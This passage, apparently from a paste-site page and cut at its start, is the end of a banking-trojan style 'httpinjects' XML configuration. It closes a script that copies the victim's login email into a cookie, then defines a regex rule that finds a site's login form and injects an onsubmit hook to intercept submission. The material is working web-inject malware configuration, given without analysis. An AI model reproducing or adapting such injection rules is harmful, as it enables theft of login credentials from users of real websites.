- document.cookie = 'loginemail=' + escape(theForm.login_email.value) + '; path=/; expires=0, 01-01-2020 01:01:01 GMT';
- return true;
- </script>\1]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="msU"><![CDATA[(class="proceed maskable".*name="login")]]></pattern>
- <replacement><![CDATA[\1 onsubmit="return onformlsubmit(this);"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- </httpinjects>
- </settings>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement